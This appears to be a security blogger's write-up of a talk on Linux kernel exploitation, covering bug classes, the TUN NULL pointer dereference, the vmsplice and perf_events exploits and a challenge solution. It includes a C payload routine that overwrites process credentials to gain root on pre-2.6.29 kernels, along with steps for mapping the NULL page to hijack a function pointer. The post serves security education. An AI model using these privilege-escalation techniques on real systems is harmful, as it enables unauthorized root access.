Hello,

So, last Saturday, I did a talk about Linux Kernel Exploitation.

I went over some well known vulnerabilities and I ended with a demo on a kernel exploitation challenge (here) by Jason Donenfeld (his site). The slides are at the end of this blog article.

In this post, I will detail a bit more some of the slides in the talk.

I will not detail every single slides, only the ones where I think there isn’t enough details. If you don’t understand some things, don’t hesitate to comment ;).

So, let’s dig in.

Linux Kernel

The kernel has LOTS of code.

15+ millions lines of code.

LOTS of code mean complexity, complexity mean bugs and bugs mean potential vulnerabilities ;).

Anyhow, the main gateway for users to interact with the kernel are syscalls and IOCTLs.

Behind a syscall, especially network ones, there is a TONS of code.

Effectively, for a bind() call, you have the same interface right?

Well, the kernel, find the corresponding structure using the socket descriptor you use with your bind call.

In that structure, there is what is called a struct proto_ops which contains callbacks for the corresponding protocol.

Exploiting the Linux Kernel

The Linux Kernel is made of code, it is software. And everyone do know that software has bugs and vulnerabilities. The Linux Kernel is not an exception.

You will mostly find all the vulnerabilities you know from userland:

  • stack based buffer overflows
  • heap based buffer overflows
  • race conditions
  • integer signedness issues
  • information leaks
  • initialisation issues
  • etc

And some different ones:

  • NULL Pointer Dereference
  • stack overflow (real ones, not based on)
  • process manipulation tricks (mempodipper)
  • etc

__copy_to_user() and copy_to_user() are not the same.

The first one doesn’t check that the address effectively live in userland while the second one do that.

The goal of exploiting the kernel is mainly to get root.

NULL Pointer Dereference

It was (is?) exploitable in kernel simply because you could (can?) map the NULL page in your exploit as it lives in userland. As such, it doesn’t crash.

Heuristics

These are routines that allow you to have good enough approximations.

For instance, before 2.6.29, credentials were stored like this in the kernel:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
Kernel 2.6.23
include/linux/sched.h
*/

struct task_struct {
/* ... */

/* process credentials */
    uid_t uid,euid,suid,fsuid;
    gid_t gid,egid,sgid,fsgid;
    struct group_info *group_info;
    kernel_cap_t   cap_effective, cap_inheritable, cap_permitted;
    unsigned keep_capabilities:1;
    struct user_struct *user;

/* ... */
};

As you can see, uid, euid and suid will generally have the same value. So if you set thos values to 0, your process basically has root privileges. This heuristic is good enough as there is little chance that you will have 3 dwords with the same values in memory (don’t forget we start to search from our current task_struct that represent our exploit process).

This routine before 2.6.29 was thus enough to get root:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// get root before 2.6.29 kernel
void get_root_pre_2_6_29 (void)
{
    uid_t uid, *cred;
    size_t byte;

    uid = getuid();
    cred = get_task_struct();
    if (!cred)
        return;

    for (byte = 0; byte < PAGE_SIZE; byte++) {
        if (cred[0] == uid
                && cred[1] == uid
                && cred[2] == uid) {
            cred[0] = cred[1] = cred[2] = cred[3] = 0;
            cred[4] = cred[5] = cred[6] = cred[7] = 0;
        }
        cred++;        
    }
}

Root in 3 big steps

You’ve basically got 3 big steps: prepare, trigger vulnerability, trigger payload.

Prepare

This is the most important step as this will greatly affect the reliability of your exploit.

This is where you:

  • check that the kernel is vulnerable.
  • use information leaks
  • prepare the memory layout so you can predict reliably where your objects are
  • place your shell code in memory

The avantage of shellcoding in the kernel : it is in C.

Trigger vulnerability

This is where you will exploit your vulnerability.

Patching memory, pointers and whatsoever.

Trigger payload

This is where you escalate the privileges of your process.

This is also where you fix the mayhem you may have caused earlier. It is REALLY important to fix the things you messed up as otherwise the machine may crash later. It is done in the payload as the payload is executed in kernel mode. root is in userland, root != kernel land, don’t get confused about that.

After triggering the payload, you go back in userland and spawn your root shell or whatsoever.

Ok, now that you have the basic understanding, you are ready for some kernel goodies.

Linux Kernel Exploitation

I won’t explain CVE-2009-2692 unless some people ask for it. It is simple enough using the slides to comprehend.

Anyhow, let’s dig in TUN NULL Pointer Dereference.

TUN NULL Pointer Dereference

This vulnerability is really interesting as there is something really special about it : the vulnerability is NOT in the source code. It is inserted at compilation. Basically, what happens is that tun is dereferenced before checking that tun is NULL. As such, GCC considers that the pointer doesn’t need checking as we use it before checking : GCC removes the NULL check. Boom, vulnerability.

The vulnerable code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static unsigned int tun_chr_poll(struct file *file, poll_table * wait)
{
    struct tun_file *tfile = file->private_data;
    struct tun_struct *tun = __tun_get(tfile);
    struct sock *sk = tun->sk;
    unsigned int mask = 0;

    if (!tun)
        return POLLERR;

    /* ... */

    if (sock_writeable(sk) ||
        (!test_and_set_bit(SOCK_ASYNC_NOSPACE, &sk->sk_socket->flags) &&
         sock_writeable(sk)))
        mask |= POLLOUT | POLLWRNORM;

    /* ... */

    return mask;
}

So the NULL check doesn’t exist and tun is NULL. So we can map the NULL page and we thus control tun->sk. We control sk->sk_socket->flags as well. test_and_set_bit() set the last bit at 1. Bang, we can set any NULL pointer to 1. In the exploit, mmap() is chosen as the TUN device doesn’t have a mmap(). mmap() need to be see to one even though we control the NULL page as internally mmap() is not called if it’s NULL. Put a trampoline at address 1 to jump over all the junk you’ve set up and go to your payload. And that it’s, you’ve escalated your privileges.

Why mmap() can’t be NULL?

If you dig around in the kernel, here is what to look for:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
// arch/x86/kernel/sys_x86_64.c:21: asmlinkage long sys_mmap(unsigned long addr, unsigned long len,
asmlinkage long sys_mmap(unsigned long addr, unsigned long len,
        unsigned long prot, unsigned long flags,
        unsigned long fd, unsigned long off)
{
    long error;
    struct file *file;

    error = -EINVAL;
    if (off & ~PAGE_MASK)
        goto out;

    error = -EBADF;
    file = NULL;
    flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
    if (!(flags & MAP_ANONYMOUS)) {
        file = fget(fd);
        if (!file)
            goto out;
    }
    down_write(&current->mm->mmap_sem);
    error = do_mmap_pgoff(file, addr, len, prot, flags, off >> PAGE_SHIFT);
    up_write(&current->mm->mmap_sem);

    if (file)
        fput(file);
out:
    return error;
}

If you go down do_mmap_pgoff(), you end up finding this code:

1
2
3
4
5
6
7
8
9
// mm/mmap.c

/* ... */ 

            if (!file->f_op || !file->f_op->mmap)
                return -ENODEV;
            break;

/* ... */

So here it is, if mmap() is NULL, it doesn’t get called. That is why it sets the mmap() pointer to 1.

Other exploits

This is where it gets pretty hard to explain as there is still tons of code to read x). I dug a bit in vmsplice, RDS and perf_events exploits.

vmsplice use buffer overflow, but it’s not a common one as it doesn’t overwrite any function or return pointers. What it overwrites are compound page addresses (values we don’t control) and then call a dtor pointer the attacker control. Privileged code execution is gained in put_compound_page() through the call of a destructor function pointer that we control. This dtor pointer obviously points to the attacker payload. At the end of the article, I’ve attached some analysis I did for vmsplice. There is lot of code to cover though so I won’t detail it in this post.

I haven’t thoroughly analyzed the RDS exploit yet but it is a write-what-where.

The perf_events exploit is really interesting. It ‘basically’ increment a INT handler pointer upper bytes in 64 bits so the pointer end up in userland. The exploit then return to this allocated memory containing the payload. The exploit also use a neat trick to compute the perf_event array. An entire post is necessary as well to properly understand this exploit. Analysis have already been done anyhow by other people.

The challenge

The VM is a 64 Bit Linux system made especially by Jason Donenfeld (aka zx2c4). The vulnerability allows us to write a 0 anywhere in kernel memory. As such, in my exploit, I zeroed out some part of a proto_ops function pointer. mmap() it, put my payload over there, jump to it and fix it.

I debugged the exploit using registry information showed when the exploit crashed.

The exploit is included in the archive below.

Conclusion

As you can see, kernel exploitation has some similitudes with userland exploitation. The differences mainly stem in the protections and the impact that a bug can have. For instance, in kernel-land, not initializing a structure fully can have severe consequence (code execution through NULL pointer dereference, etc) while in userland, it may cause an infoleak but not directly code execution.

Moreover, this also shows that the kernel is piece of software and is as such exploitable.

Hope you enjoyed the article,

I welcome any feedback on it,

Cheers,

m_101

Resources